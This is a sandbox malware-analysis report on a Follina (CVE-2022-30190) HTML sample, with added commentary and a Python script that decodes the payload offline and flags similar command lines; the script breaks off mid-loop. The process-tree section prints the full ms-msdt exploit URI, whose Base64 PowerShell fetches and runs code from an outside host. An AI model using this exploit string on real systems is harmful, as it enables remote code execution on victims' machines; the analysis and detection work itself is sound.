Windows Analysis Report
1.html

Overview

General Information

Sample Name: 1.html
Analysis ID: 638689
MD5: ea483ab89d8b9baf00b953f0636e0520
SHA1: b0b952334f0d0195b06faed532170263f7fad6c2
SHA256: 5385a798d136365b644199359dc2662de3b0d6c5adc09e4cf9cada074e8a9338
Tags: Follinahtml

Detection

Follina CVE-2022-30190
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: 1.html Virustotal: Detection: 32% Perma Link

Exploits

Source: Yara match File source: 1.html, type: SAMPLE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txt Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\ Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json Jump to behavior
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb` source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C898C3 FindFirstFileExW, 27_2_00C898C3
Source: Joe Sandbox View IP Address: 239.255.255.250 (the SSDP/UPnP multicast group, a reserved address that cannot be an attacker-controlled host; treat this "IP address seen in connection with other malware" hit as noise)
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: Ruleset Data.0.dr String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ChromeRecovery.exe.26.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://ocsp.digicert.com0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://apis.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 176bd4d4-b466-471c-b2dc-78592e59bf93.tmp.1.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://dns.google
Source: LICENSE.txt.0.dr String found in binary or memory: https://easylist.to/)
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://play.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr String found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://www.gstatic.com
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 (Chrome's own sign-in state check; background browser traffic, not part of the exploit chain)
  Host: accounts.google.com
  Connection: keep-alive
  Content-Length: 1
  Origin: https://www.google.com
  Content-Type: application/x-www-form-urlencoded
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: unknown DNS traffic detected: queries for: clients2.google.com
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 (Chrome's extension/component update endpoint; background browser traffic, not attacker infrastructure)
  Host: clients2.google.com
  Connection: keep-alive
  X-Goog-Update-Interactivity: fg
  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
  X-Goog-Update-Updater: chromecrx-85.0.4183.121
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C79029 lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard, 27_2_00C79029
Source: 1.html, type: SAMPLE Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: 0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 5808, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8C8DF 27_2_00C8C8DF
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C951B0 27_2_00C951B0
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C87AF1 27_2_00C87AF1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C9328B 27_2_00C9328B
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C802A1 27_2_00C802A1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C94A67 27_2_00C94A67
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C9423B 27_2_00C9423B
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C944E5 27_2_00C944E5
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8F428 27_2_00C8F428
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C93EC9 27_2_00C93EC9
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C956B9 27_2_00C956B9
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C87E39 27_2_00C87E39
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C947AC 27_2_00C947AC
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8EFA0 27_2_00C8EFA0
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: String function: 00C7FE60 appears 43 times
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C79D31: CreateFileW,DeviceIoControl,CloseHandle, 27_2_00C79D31
Source: ChromeRecovery.exe.26.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1.html Virustotal: Detection: 32%
Source: C:\Windows\System32\msdt.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Process created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
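The msdt.exe launch above is the whole exploit chain in this report. The generic signatures listed earlier (anti-debug checks, GetProcAddress use, dropped PE files, clipboard access, cpuid, DeviceIoControl) are all raised on ChromeRecovery.exe, which elevation_service.exe (Chrome's own elevation service) unpacked from ChromeRecoveryCRX.crx during the run; they say nothing about the sample. What matters is that chrome.exe handed an ms-msdt: URI to msdt.exe, the URI selects the PCWDiagnostic troubleshooter pack, and the IT_BrowseForFile parameter carries a PowerShell subexpression $( ... ) that the troubleshooter's PowerShell host evaluates while validating the path. The trailing i/../../.../Windows/System32/mpsigstub.exe resolves to a file that exists, so validation passes, and IT_RebrowseForFile=cal?c is the string left over from the widely circulated proof-of-concept template. Inside the subexpression, two layers of Invoke-Expression wrap a string assembled from literals and [char]58 / [char]34 casts (which are :: and ") around a Base64 blob. The Python below is an added example, not part of the Joe Sandbox report: it takes the command line exactly as recorded above and replays those transformations offline, never evaluating the payload, and adds a small detection heuristic of my own (not the Yara rule the report matched).

```python
import base64
import re
import urllib.parse

# msdt.exe command line exactly as the report's process tree recorded it.
MSDT_CMDLINE = (
    r'"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20'
    r"%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20"
    r"IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58"
    r"+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'"
    "R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBO"
    "ZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=="
    r"'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
    r"%20IT_AutoTroubleshoot=ts_AUTO%22"
)


def _matching_paren(text: str, open_idx: int) -> int:
    """Index of the ')' closing the '(' at open_idx. Parentheses inside single-quoted
    PowerShell literals are skipped: the payload's literals contain '(' and ')'."""
    depth, in_quote = 0, False
    for i in range(open_idx, len(text)):
        ch = text[i]
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote and ch == "(":
            depth += 1
        elif not in_quote and ch == ")":
            depth -= 1
            if depth == 0:
                return i
    raise ValueError("unbalanced parentheses")


def extract_subexpression(cmdline: str) -> str:
    """Stage 1: percent-decode the URI and return the body of the $( ... ) smuggled
    into IT_BrowseForFile, which the troubleshooter's PowerShell host evaluates."""
    decoded = urllib.parse.unquote(cmdline)
    start = decoded.index("$(")
    return decoded[start + 2 : _matching_paren(decoded, start + 1)]


def peel_invoke_expression(expr: str):
    """Stage 2: strip nested Invoke-Expression( ... ) and $( ... ) wrappers.
    Returns the innermost expression and how many iex evaluations were implied."""
    layers, expr = 0, expr.strip()
    while True:
        for prefix, is_iex in (("Invoke-Expression(", 1), ("$(", 0)):
            if expr.startswith(prefix):
                end = _matching_paren(expr, len(prefix) - 1)
                if end != len(expr) - 1:  # wrapper does not span the whole expression
                    return expr, layers
                expr, layers = expr[len(prefix):end].strip(), layers + is_iex
                break
        else:
            return expr, layers


def fold_concatenation(expr: str) -> str:
    """Stage 3: evaluate a 'literal'+[char]N+'literal' concatenation. Only string
    literals and [char] casts are honoured, so nothing here can execute."""
    token = re.compile(r"\s*(?:'([^']*)'|\[char\](\d+))\s*(?:\+|$)")
    parts, pos = [], 0
    while pos < len(expr):
        m = token.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported token near {expr[pos:pos + 20]!r}")
        parts.append(m.group(1) if m.group(1) is not None else chr(int(m.group(2))))
        pos = m.end()
    return "".join(parts)


def decode_base64_payload(ps_expr: str) -> str:
    """Stage 4: recognise [Convert]::FromBase64String("...") and decode it offline."""
    m = re.search(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', ps_expr)
    if not m:
        raise ValueError("no FromBase64String literal found")
    return base64.b64decode(m.group(1)).decode("utf-8")


def triage_msdt_cmdline(cmdline: str) -> dict:
    """Run every stage and return what an analyst needs from the command line."""
    inner, layers = peel_invoke_expression(extract_subexpression(cmdline))
    ps_expr = fold_concatenation(inner)
    final_cmd = decode_base64_payload(ps_expr)
    return {"iex_layers": layers, "powershell_expression": ps_expr, "final_command": final_cmd,
            "urls": re.findall(r"https?://[^\s'\"]+", final_cmd)}


def looks_like_follina(cmdline: str) -> bool:
    """Detection heuristic (mine, not the report's Yara rule): an ms-msdt URI that selects
    PCWDiagnostic and carries a $( ) subexpression inside IT_BrowseForFile."""
    d = urllib.parse.unquote(cmdline)
    return "ms-msdt:" in d and "PCWDiagnostic" in d and bool(re.search(r"IT_BrowseForFile=\S*\$\(", d))


if __name__ == "__main__":
    for key, value in triage_msdt_cmdline(MSDT_CMDLINE).items():
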